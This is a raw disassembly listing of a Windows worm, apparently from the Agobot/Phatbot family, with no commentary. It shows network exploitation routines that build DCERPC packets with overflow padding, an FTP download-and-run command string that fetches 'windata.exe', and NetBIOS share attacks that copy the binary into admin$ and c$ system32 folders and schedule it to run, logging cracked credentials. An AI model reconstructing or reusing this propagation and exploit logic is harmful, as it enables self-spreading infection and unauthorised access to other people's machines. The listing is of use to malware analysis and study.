jbe short loc_40F596
add [ebp-18h], eax
loc_40F579: ; CODE XREF: sub_40F47A+11A�j
movsx eax, byte ptr [ebp+esi-14h]
movsx eax, ds:byte_43F870[eax]
push eax
push 1
lea ecx, [ebp-38h]
call sub_40F1FF
inc esi
cmp esi, [ebp-1Ch]
jb short loc_40F579
loc_40F596: ; CODE XREF: sub_40F47A+FA�j
cmp dword ptr [ebp-18h], 48h
jb short loc_40F5AA
push dword ptr [ebp+14h]
lea ecx, [ebp-38h]
call sub_40F440
mov [ebp-18h], edi
loc_40F5AA: ; CODE XREF: sub_40F47A+120�j
push 4
pop esi
cmp [ebp-1Ch], esi
jnb short loc_40F5C4
sub esi, [ebp-1Ch]
loc_40F5B5: ; CODE XREF: sub_40F47A+148�j
push 3Dh
push 1
lea ecx, [ebp-38h]
call sub_40F1FF
dec esi
jnz short loc_40F5B5
loc_40F5C4: ; CODE XREF: sub_40F47A+136�j
cmp [ebp+10h], edi
ja loc_40F4C3
pop esi
pop ebx
loc_40F5CF: ; CODE XREF: sub_40F47A+3E�j
mov ecx, [ebp+8]
lea eax, [ebp-38h]
push eax
call sub_40F41A
push edi
push 1
lea ecx, [ebp-38h]
call sub_40EF65
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
mov large fs:0, ecx
leave
retn
sub_40F47A endp
; =============== S U B R O U T I N E =======================================
sub_40F5F6 proc near ; CODE XREF: seg000:0040F7F1�p
mov eax, offset aAjc ; "¸€¦C"
call sub_420364
sub esp, 1Ch
push ebx
push esi
push edi
and dword ptr [ebp-4], 0
push offset byte_42B633
push dword ptr [ebp+10h]
lea eax, [ebp-28h]
push dword ptr [ebp+0Ch]
push eax
call sub_40F47A
mov eax, [ebp+28h]
mov ecx, [ebp-14h]
lea esi, [ecx+eax+36h]
push esi
mov byte ptr [ebp-4], 1
call sub_41E5D3
mov edi, eax
add esp, 14h
test edi, edi
jnz short loc_40F63F
xor bl, bl
jmp short loc_40F686
; ---------------------------------------------------------------------------
loc_40F63F: ; CODE XREF: sub_40F5F6+43�j
cmp dword ptr [ebp-10h], 10h
mov ecx, [ebp-24h]
jnb short loc_40F64B
lea ecx, [ebp-24h]
loc_40F64B: ; CODE XREF: sub_40F5F6+50�j
cmp dword ptr [ebp+2Ch], 10h
mov eax, [ebp+18h]
jnb short loc_40F657
lea eax, [ebp+18h]
loc_40F657: ; CODE XREF: sub_40F5F6+5C�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi
push edi
call sub_41E6FE
add esp, 14h
push 0
push esi
push edi
push dword ptr [ebp+8]
call ds:dword_4441A0 ; send
cmp eax, esi
jz short loc_40F67D
xor bl, bl
jmp short loc_40F67F
; ---------------------------------------------------------------------------
loc_40F67D: ; CODE XREF: sub_40F5F6+81�j
mov bl, 1
loc_40F67F: ; CODE XREF: sub_40F5F6+85�j
push edi
call sub_41E2A1
pop ecx
loc_40F686: ; CODE XREF: sub_40F5F6+47�j
push 0
push 1
lea ecx, [ebp-28h]
call sub_40EF65
push 0
push 1
lea ecx, [ebp+14h]
call sub_40EF65
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, bl
pop ebx
mov large fs:0, ecx
leave
retn
sub_40F5F6 endp
; =============== S U B R O U T I N E =======================================
sub_40F6AF proc near ; CODE XREF: seg000:0040F7E5�p
; sub_4297E3+15�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40EF49
push [esp+4+arg_0]
mov ecx, esi
call sub_40F45D
mov eax, esi
pop esi
retn 4
sub_40F6AF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
push edi
xor eax, eax
mov byte ptr [ebp-420h], 0
mov ecx, 0FFh
lea edi, [ebp-41Fh]
rep stosd
stosw
push 8Fh
stosb
lea eax, [ebp-420h]
push offset dword_43FA20
push eax
call sub_41F400
add esp, 0Ch
mov eax, offset aWindata_exe ; "windata.exe"
push eax
push eax
movzx eax, word ptr ds:dword_4D1FE4
push eax
push dword ptr [ebp+8]
call sub_4023C9
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp-391h]
push 400h
push eax
call sub_41E6FE
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset aSvwfbA ; "SVWfì€"
push eax
call sub_40E971
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_40F76F
xor eax, eax
jmp loc_40F875
; ---------------------------------------------------------------------------
loc_40F76F: ; CODE XREF: seg000:0040F766�j
mov [ebp-0Ch], esi
loc_40F772: ; CODE XREF: seg000:0040F850�j
test esi, esi
jnz loc_40F856
push 6
push 1
push 2
call ds:dword_42B20C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40F83E
push dword ptr [ebp+0A8h]
xor eax, eax
lea edi, [ebp-1Ah]
stosd
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call ds:dword_444260 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_44417C ; inet_addr
mov [ebp-18h], eax
push 10h
lea eax, [ebp-1Ch]
push eax
push ebx
call ds:dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40F833
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_40F7FB
sub esp, 1Ch
lea eax, [ebp+0Ch]
mov ecx, esp
mov [ebp-20h], esp
push eax
call sub_40F6AF
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40F5F6
add esp, 28h
jmp short loc_40F830
; ---------------------------------------------------------------------------
loc_40F7FB: ; CODE XREF: seg000:0040F7D7�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_40F815
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40EE6B
jmp short loc_40F82D
; ---------------------------------------------------------------------------
loc_40F815: ; CODE XREF: seg000:0040F805�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_40F833
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40ED91
loc_40F82D: ; CODE XREF: seg000:0040F813�j
add esp, 0Ch
loc_40F830: ; CODE XREF: seg000:0040F7F9�j
movzx esi, al
loc_40F833: ; CODE XREF: seg000:0040F7CE�j
; seg000:0040F81F�j
push ebx
call ds:dword_444218 ; closesocket
test esi, esi
jnz short loc_40F849
loc_40F83E: ; CODE XREF: seg000:0040F78B�j
push 3E8h
call ds:dword_42B014 ; Sleep
loc_40F849: ; CODE XREF: seg000:0040F83C�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40F772
loc_40F856: ; CODE XREF: seg000:0040F774�j
lea ecx, [ebp-8]
call sub_40E7A0
test esi, esi
jz short loc_40F873
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
loc_40F873: ; CODE XREF: seg000:0040F860�j
mov eax, esi
loc_40F875: ; CODE XREF: seg000:0040F76A�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F87A proc near ; CODE XREF: seg000:0040FC33�p
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
xor edi, edi
push 20h
lea eax, [ebp+var_24]
push edi
push eax
mov [ebp+var_4], edi
call sub_41E5F0
push offset asc_433148 ; "\\\\"
mov esi, offset dword_4D50D8
push esi
call sub_41EEC0
push [ebp+arg_0]
push esi
call sub_41EED0
push offset asc_433144 ; "\\"
push esi
call sub_41EED0
push offset aAdmin ; "admin$"
push esi
call sub_41EED0
add esp, 2Ch
push edi
push edi
push edi
lea eax, [ebp+var_24]
push eax
mov [ebp+var_10], esi
mov [ebp+var_20], 1
mov [ebp+var_14], edi
mov [ebp+var_8], edi
call ds:dword_4441AC
push ds:dword_4437B0
push [ebp+arg_0]
push ds:dword_4D51D8
call sub_4204DD
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
push 66h
push ds:dword_4D51D8
call ds:dword_4440DC
test eax, eax
mov esi, offset dword_4D51E0
jnz short loc_40F929
mov eax, [ebp+var_4]
push edi
push edi
push 64h
push esi
push 0FFFFFFFFh
push dword ptr [eax+4]
push edi
push edi
call ds:dword_42B090 ; WideCharToMultiByte
loc_40F929: ; CODE XREF: sub_40F87A+98�j
cmp [ebp+var_4], edi
jz short loc_40F937
push [ebp+var_4]
call ds:dword_444140
loc_40F937: ; CODE XREF: sub_40F87A+B2�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_40F87A endp
; =============== S U B R O U T I N E =======================================
sub_40F93D proc near ; CODE XREF: sub_40F9CE+39�p
; sub_40F9CE+79�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
xor edi, edi
call sub_41E1C0
test eax, eax
pop ecx
jbe short loc_40F99E
lea edx, [esi+1]
lea esi, [eax-1]
shr esi, 1
inc esi
loc_40F959: ; CODE XREF: sub_40F93D+5F�j
mov al, [edx-1]
cmp al, 30h
jl short loc_40F96C
cmp al, 39h
jg short loc_40F96C
movsx eax, al
sub eax, 30h
jmp short loc_40F972
; ---------------------------------------------------------------------------
loc_40F96C: ; CODE XREF: sub_40F93D+21�j
; sub_40F93D+25�j
movsx eax, al
sub eax, 57h
loc_40F972: ; CODE XREF: sub_40F93D+2D�j
mov cl, [edx]
shl eax, 4
cmp cl, 30h
jl short loc_40F98A
cmp cl, 39h
jg short loc_40F98A
movsx ecx, cl
lea eax, [eax+ecx-30h]
jmp short loc_40F991
; ---------------------------------------------------------------------------
loc_40F98A: ; CODE XREF: sub_40F93D+3D�j
; sub_40F93D+42�j
movsx ecx, cl
lea eax, [eax+ecx-57h]
loc_40F991: ; CODE XREF: sub_40F93D+4B�j
mov ecx, [esp+8+arg_4]
mov [edi+ecx], al
inc edi
inc edx
inc edx
dec esi
jnz short loc_40F959
loc_40F99E: ; CODE XREF: sub_40F93D+11�j
mov eax, edi
pop edi
pop esi
retn
sub_40F93D endp
; =============== S U B R O U T I N E =======================================
sub_40F9A3 proc near ; CODE XREF: sub_40F9CE+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov edx, eax
xor esi, esi
shr edx, 1
jz short loc_40F9CC
push ebx
push edi
mov edi, [esp+0Ch+arg_0]
lea eax, [edi+eax-1]
loc_40F9BA: ; CODE XREF: sub_40F9A3+25�j
mov bl, [esi+edi]
mov cl, [eax]
mov [eax], bl
mov [esi+edi], cl
inc esi
dec eax
cmp esi, edx
jb short loc_40F9BA
pop edi
pop ebx
loc_40F9CC: ; CODE XREF: sub_40F9A3+B�j
pop esi
retn
sub_40F9A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F9CE proc near ; CODE XREF: sub_40FA56+69�p
; sub_40FA56+89�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor esi, esi
push ebx
mov [ebp+var_4], esi
mov [ebp+var_8], esi
mov edi, ebx
call sub_41E1C0
mov [ebp+arg_0], esi
cmp eax, esi
mov esi, [ebp+arg_4]
pop ecx
mov [ebp+var_C], eax
jbe short loc_40FA41
loc_40F9F8: ; CODE XREF: sub_40F9CE+71�j
mov eax, [ebp+arg_0]
add eax, ebx
cmp byte ptr [eax], 2Dh
jnz short loc_40FA36
push esi
push edi
mov byte ptr [eax], 0
call sub_40F93D
cmp [ebp+var_8], 3
jnb short loc_40FA25
mov edi, eax
push edi
push esi
call sub_40F9A3
add esp, 10h
add esi, edi
add [ebp+var_4], edi
jmp short loc_40FA2C
; ---------------------------------------------------------------------------
loc_40FA25: ; CODE XREF: sub_40F9CE+42�j
pop ecx
add esi, eax
add [ebp+var_4], eax
pop ecx
loc_40FA2C: ; CODE XREF: sub_40F9CE+55�j
mov eax, [ebp+arg_0]
inc [ebp+var_8]
lea edi, [eax+ebx+1]
loc_40FA36: ; CODE XREF: sub_40F9CE+32�j
inc [ebp+arg_0]
mov eax, [ebp+var_C]
cmp [ebp+arg_0], eax
jb short loc_40F9F8
loc_40FA41: ; CODE XREF: sub_40F9CE+28�j
push esi
push edi
mov byte ptr [eax+esi], 0
call sub_40F93D
add eax, [ebp+var_4]
pop ecx
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40F9CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA56 proc near ; CODE XREF: seg000:0040FBEE�p
var_2C = byte ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
push 9
pop ecx
mov esi, offset a8a885d041ceb11 ; "8a885d04-1ceb-11c9-9fe8-08002b104860"
lea edi, [ebp+var_2C]
rep movsd
push 1
push 800h
movsb
call sub_4205E4
pop ecx
pop ecx
push 1
push [ebp+arg_4]
mov esi, eax
call sub_41E1C0
shr eax, 1
inc eax
pop ecx
inc eax
push eax
call sub_4205E4
mov [ebp+var_4], eax
xor eax, eax
mov edi, esi
add esi, 10h
inc eax
xor ebx, ebx
mov word ptr [esi], 16D0h
mov word ptr [esi+2], 16D0h
mov [esi+4], ebx
mov [esi+8], eax
mov [esi+0Ch], bx
mov [esi+0Eh], ax
add esi, 10h
push esi
push [ebp+arg_4]
call sub_40F9CE
add esi, eax
push 2
lea eax, [ebp+arg_8]
push eax
push esi
call sub_41F400
inc esi
inc esi
mov [esi], bl
inc esi
mov [esi], bl
inc esi
lea eax, [ebp+var_2C]
push esi
push eax
call sub_40F9CE
mov ecx, [ebp+arg_C]
push [ebp+var_4]
add esi, eax
mov byte ptr [esi], 2
inc esi
mov [esi], bl
sub esi, edi
inc esi
lea eax, [esi+2]
mov [edi+8], ax
mov eax, [ebp+arg_0]
mov [edi+0Ch], eax
movzx eax, si
inc eax
inc eax
mov byte ptr [edi], 5
mov [edi+1], bl
mov byte ptr [edi+2], 0Bh
mov byte ptr [edi+3], 3
mov dword ptr [edi+4], 10h
mov [edi+0Ah], bx
mov [ecx], eax
call sub_41E2A1
add esp, 28h
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40FA56 endp
; =============== S U B R O U T I N E =======================================
sub_40FB31 proc near ; CODE XREF: seg000:0040FC74�p
; seg000:00410831�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push esi
call sub_41E1C0
pop ecx
mov ecx, [esp+4+arg_0]
lea ecx, [ecx+eax*2-1]
jmp short loc_40FB52
; ---------------------------------------------------------------------------
loc_40FB47: ; CODE XREF: sub_40FB31+23�j
dec eax
mov byte ptr [ecx], 0
mov dl, [eax+esi]
dec ecx
mov [ecx], dl
dec ecx
loc_40FB52: ; CODE XREF: sub_40FB31+14�j
test eax, eax
jnz short loc_40FB47
pop esi
retn
sub_40FB31 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1044h
call sub_41EA20
push ebx
xor ebx, ebx
cmp ds:dword_4440DC, ebx
push esi
push edi
jz loc_40FC28
push 9
pop ecx
mov esi, offset aFdb3a030065f11 ; "fdb3a030-065f-11d1-bb9b-00a024ea5525"
lea edi, [ebp-44h]
rep movsd
movsb
xor edi, edi
push ebx
inc edi
push edi
push 2
mov [ebp-4], edi
call ds:dword_444100 ; socket
mov esi, eax
cmp esi, ebx
mov [ebp-0Ch], esi
jl loc_40FC28
push dword ptr [ebp+0A8h]
mov word ptr [ebp-1Ch], 2
call ds:dword_444260 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call ds:dword_44417C ; inet_addr
push 8
mov [ebp-18h], eax
lea eax, [ebp-14h]
push ebx
push eax
call sub_41E5F0
add esp, 0Ch
push 10h
lea eax, [ebp-1Ch]
push eax
push esi
call ds:dword_4440AC ; connect
test eax, eax
jl short loc_40FC28
lea eax, [ebp-8]
push eax
push edi
lea eax, [ebp-44h]
push eax
push ebx
call sub_40FA56
add esp, 10h
push ebx
push dword ptr [ebp-8]
mov edi, eax
push edi
push esi
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40FC21
push ebx
push 1000h
lea eax, [ebp-1044h]
push eax
push esi
call ds:dword_42B208 ; recv
test eax, eax
jg short loc_40FC2F
loc_40FC21: ; CODE XREF: seg000:0040FC07�j
push edi
call sub_41E2A1
pop ecx
loc_40FC28: ; CODE XREF: seg000:0040FB70�j
; seg000:0040FB9B�j ...
xor eax, eax
loc_40FC2A: ; CODE XREF: seg000:0040FDBE�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40FC2F: ; CODE XREF: seg000:0040FC1F�j
lea eax, [ebp+0Ch]
push eax
call sub_40F87A
push eax
mov [ebp-8], eax
call sub_41E1C0
test eax, eax
pop ecx
pop ecx
jz short loc_40FC28
mov edi, 104Ch
push edi
call sub_41E5D3
push edi
mov esi, eax
push 90h
push esi
call sub_41E5F0
push 42h
push offset dword_43FAB0
push esi
call sub_41F400
push dword ptr [ebp-8]
lea ebx, [esi+42h]
push ebx
call sub_40FB31
push dword ptr [ebp-8]
call sub_41E1C0
push 14h
lea ebx, [ebx+eax*2]
push offset aPrivate ; "\\PRIVATE$\\"
push ebx
call sub_41F400
push 18h
mov ebx, offset dword_43FB0C
lea eax, [esi+418h]
push ebx
push eax
call sub_41F400
add esp, 40h
push 18h
lea eax, [esi+830h]
push ebx
push eax
call sub_41F400
push 18h
lea eax, [esi+0C48h]
push offset dword_43FB28
push eax
call sub_41F400
push 3Ah
lea ebx, [esi+1B6h]
push offset dword_43FB44
push ebx
call sub_41F400
push 0FFFFh
push 539h
call sub_41B325
mov [ebp-8], eax
add esp, 2Ch
xor eax, 437h
push eax
call ds:dword_444260 ; htons
push 158h
push offset dword_43FB80
add ebx, 3Ah
push ebx
mov ds:word_43FC3A, ax
call sub_41F400
xor ebx, ebx
inc ebx
lea eax, [ebp+0Ch]
push ebx
push eax
mov byte ptr [esi+104Ah], 0
mov byte ptr [esi+104Bh], 0
call sub_41AA0A
add esp, 14h
cmp eax, 2
jnz short loc_40FD41
mov dword ptr [ebp-4], 8
loc_40FD41: ; CODE XREF: seg000:0040FD38�j
cmp eax, 3
jnz short loc_40FD64
mov [ebp-4], ebx
jmp short loc_40FD64
; ---------------------------------------------------------------------------
loc_40FD4B: ; CODE XREF: seg000:0040FD68�j
dec dword ptr [ebp-4]
push 0
push edi
push esi
push dword ptr [ebp-0Ch]
call ds:dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40FC28
loc_40FD64: ; CODE XREF: seg000:0040FD44�j
; seg000:0040FD49�j
cmp dword ptr [ebp-4], 0
jnz short loc_40FD4B
push dword ptr [ebp-0Ch]
call ds:dword_444218 ; closesocket
push 1F4h
call ds:dword_42B014 ; Sleep
push esi
call sub_41E2A1
pop ecx
push dword ptr [ebp-8]
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz loc_40FC28
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
mov eax, ebx
jmp loc_40FC2A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FDC3 proc near ; CODE XREF: sub_410047+37�p
var_6EC = byte ptr -6ECh
var_4E4 = byte ptr -4E4h
var_2E4 = byte ptr -2E4h
var_154 = byte ptr -154h
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_20 = byte ptr 28h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
sub esp, 6ECh
push esi
push edi
push 20h
xor edi, edi
lea eax, [ebp+var_50]
push edi
push eax
call sub_41E5F0
mov esi, [ebp+arg_8]
add esp, 0Ch
push edi
push [ebp+arg_0]
lea eax, [ebp+var_50]
push [ebp+arg_4]
mov [ebp+var_3C], esi
push eax
mov [ebp+var_4C], 1
mov [ebp+var_40], edi
mov [ebp+var_34], edi
call ds:dword_4441AC
test eax, eax
jz short loc_40FE14
push 0Ah
call ds:dword_42B014 ; Sleep
jmp loc_410034
; ---------------------------------------------------------------------------
loc_40FE14: ; CODE XREF: sub_40FDC3+42�j
push ebx
push 190h
lea eax, [ebp+var_2E4]
push eax
push 0FFFFFFFFh
push esi
push edi
push edi
mov [ebp+var_1C], offset aAdminSystem32 ; "Admin$\\system32"
mov [ebp+var_18], offset aCWinntSystem32 ; "c$\\winnt\\system32"
mov [ebp+var_14], offset aCWindowsSystem ; "c$\\windows\\system32"
mov [ebp+var_10], offset aC ; "c"
mov [ebp+var_C], offset aD_0 ; "d"
mov [ebp+var_8], edi
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_2E4]
push eax
call ds:dword_44406C
test eax, eax
jnz loc_410030
cmp [ebp+var_8], edi
jz loc_410030
mov [ebp+var_4], edi
mov esi, offset aWindata_exe ; "windata.exe"
loc_40FE7C: ; CODE XREF: sub_40FDC3+150�j
mov eax, [ebp+var_4]
push esi
push [ebp+eax*4+var_1C]
lea eax, [ebp+var_154]
push [ebp+arg_8]
push offset aSSS_2 ; "%s\\%s\\%s"
push eax
call sub_41E6A6
add esp, 14h
push edi
lea eax, [ebp+var_154]
push eax
push esi
call ds:dword_42B048 ; CopyFileA
mov ebx, eax
cmp ebx, edi
jnz short loc_40FF2B
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 5
jnz short loc_40FF0C
lea eax, [ebp+var_154]
push edi
push eax
call sub_42065F
test eax, eax
pop ecx
pop ecx
jnz short loc_40FF0C
call sub_41ECDE
cdq
push 0Ah
pop ecx
idiv ecx
lea eax, [ebp+var_154]
push eax
mov ebx, edx
add bl, 30h
call sub_41E1C0
pop ecx
lea ecx, [ebp+var_154]
sub ecx, 5
mov [eax+ecx], bl
push edi
lea eax, [ebp+var_154]
push eax
push esi
call ds:dword_42B048 ; CopyFileA
mov ebx, eax
cmp ebx, edi
jnz short loc_40FF2B
loc_40FF0C: ; CODE XREF: sub_40FDC3+F6�j
; sub_40FDC3+109�j
inc [ebp+var_4]
cmp [ebp+var_4], 5
jb loc_40FE7C
cmp ebx, edi
jnz short loc_40FF2B
push [ebp+var_8]
call ds:dword_444140
jmp loc_410033
; ---------------------------------------------------------------------------
loc_40FF2B: ; CODE XREF: sub_40FDC3+EB�j
; sub_40FDC3+147�j ...
mov ecx, [ebp+var_8]
mov eax, [ecx]
push 3Ch
xor edx, edx
pop ebx
div ebx
xor edx, edx
push 10h
push edi
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
lea eax, [ebp+var_30]
push eax
mov ebx, edx
call sub_41E5F0
imul ebx, 0EA60h
add esp, 0Ch
push 208h
lea eax, [ebp+var_6EC]
push eax
push 0FFFFFFFFh
push esi
push edi
push edi
mov [ebp+var_30], ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+var_6EC]
mov [ebp+var_24], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2E4]
push eax
call ds:dword_4440A8
test eax, eax
jnz loc_410030
push offset byte_42B633
push [ebp+arg_4]
call sub_41E990
pop ecx
test eax, eax
pop ecx
mov eax, offset aNoPassword ; "(no password)"
jz short loc_40FFB7
mov eax, [ebp+arg_4]
loc_40FFB7: ; CODE XREF: sub_40FDC3+1EF�j
push eax
push [ebp+arg_0]
mov eax, [ebp+var_4]
push [ebp+eax*4+var_1C]
mov eax, [ebp+arg_B4]
push [ebp+arg_8]
shl eax, 6
add eax, offset aNetbios ; "NetBios"
push eax
push offset unk_43319C
lea eax, [ebp+var_4E4]
push 200h
push eax
call sub_41E6FE
add esp, 20h
cmp [ebp+arg_C0], edi
jnz short loc_410012
push edi
push [ebp+arg_BC]
lea eax, [ebp+var_4E4]
push eax
lea eax, [ebp+arg_20]
push eax
push [ebp+arg_C]
call sub_40123B
add esp, 14h
loc_410012: ; CODE XREF: sub_40FDC3+230�j
lea eax, [ebp+var_4E4]
push eax
call sub_417D70
mov eax, [ebp+arg_B4]
shl eax, 6
lea eax, dword_43D888[eax]
inc dword ptr [eax]
pop ecx
loc_410030: ; CODE XREF: sub_40FDC3+A2�j
; sub_40FDC3+AB�j ...
xor edi, edi
inc edi
loc_410033: ; CODE XREF: sub_40FDC3+163�j
pop ebx
loc_410034: ; CODE XREF: sub_40FDC3+4C�j
push 1
push 1
push [ebp+arg_8]
call ds:dword_4440D8
loc_410041: ; DATA XREF: seg000:00410419�o
mov eax, edi
pop edi
pop esi
leave
retn
sub_40FDC3 endp
; =============== S U B R O U T I N E =======================================
sub_410047 proc near ; CODE XREF: seg000:004101DF�p
; seg000:00410256�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
cmp ds:off_43C270, 0
push ebx
push esi
push edi
jz short loc_4100A3
mov eax, offset off_43C270
mov ebx, eax
loc_41005A: ; CODE XREF: sub_410047+5A�j
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
push [esp+0C8h+arg_4]
lea esi, [esp+0CCh+arg_8]
push dword ptr [eax]
rep movsd
push [esp+0D0h+arg_0]
call sub_40FDC3
add esp, 0C8h
cmp eax, 1
jz short loc_4100A9
push 0C8h
call ds:dword_42B014 ; Sleep
add ebx, 4
cmp dword ptr [ebx], 0
mov eax, ebx
jnz short loc_41005A
loc_4100A3: ; CODE XREF: sub_410047+A�j
xor eax, eax
loc_4100A5: ; CODE XREF: sub_410047+65�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4100A9: ; CODE XREF: sub_410047+45�j
xor eax, eax
inc eax
jmp short loc_4100A5
sub_410047 endp
; ---------------------------------------------------------------------------
loc_4100AE: ; DATA XREF: seg002:0043D884�o
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
push edi
lea eax, [ebp+0Ch]
push eax
xor ebx, ebx
lea eax, [ebp-30h]
push offset aS_1 ; "\\\\%s"
push eax
mov [ebp-4], ebx
mov [ebp-14h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
call sub_41E6A6
add esp, 0Ch
push 3E8h
lea eax, [ebp-62Ch]
push eax
push 0FFFFFFFFh
lea eax, [ebp-30h]
push eax
push ebx
push ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp-30h]
push eax
lea eax, [ebp-118h]
push offset aSIpc_0 ; "%s\\ipc$"
push eax
mov [ebp-40h], ebx
mov [ebp-34h], ebx
mov [ebp-4Ch], ebx
call sub_41E6A6
add esp, 0Ch
lea eax, [ebp-118h]
mov [ebp-3Ch], eax
push ebx
mov eax, offset byte_42B633
push eax
push eax
lea eax, [ebp-50h]
push eax
call ds:dword_4441AC
test eax, eax
jz short loc_41014E
push 1
push ebx
lea eax, [ebp-118h]
push eax
call ds:dword_4440D8
xor eax, eax
jmp loc_410276
; ---------------------------------------------------------------------------
loc_41014E: ; CODE XREF: seg000:00410135�j
; seg000:00410216�j
lea eax, [ebp-18h]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-14h]
push eax
push 0FFFFFFFFh
lea eax, [ebp-4]
push eax
push 2
push ebx
lea eax, [ebp-62Ch]
push eax
call ds:dword_4440E0
push 1
mov [ebp-0Ch], eax
push ebx
lea eax, [ebp-118h]
push eax
call ds:dword_4440D8
cmp [ebp-0Ch], ebx
jz short loc_410191
cmp dword ptr [ebp-0Ch], 0EAh
jnz short loc_4101FE
loc_410191: ; CODE XREF: seg000:00410186�j
mov eax, [ebp-4]
cmp eax, ebx
mov [ebp-10h], eax
jz short loc_41020F
cmp [ebp-14h], ebx
mov [ebp-8], ebx
jbe short loc_4101FE
loc_4101A3: ; CODE XREF: seg000:004101FC�j
mov eax, [ebp-10h]
cmp eax, ebx
jz short loc_4101FE
push ebx
push ebx
push 12Ch
lea ecx, [ebp-244h]
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call ds:dword_42B090 ; WideCharToMultiByte
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea eax, [ebp-30h]
push eax
lea eax, [ebp-244h]
lea esi, [ebp+8]
push eax
rep movsd
call sub_410047
add esp, 0C4h
cmp eax, 1
jz short loc_4101FE
add dword ptr [ebp-10h], 4
inc dword ptr [ebp-8]
mov eax, [ebp-8]
cmp eax, [ebp-14h]
jb short loc_4101A3
loc_4101FE: ; CODE XREF: seg000:0041018F�j
; seg000:004101A1�j ...
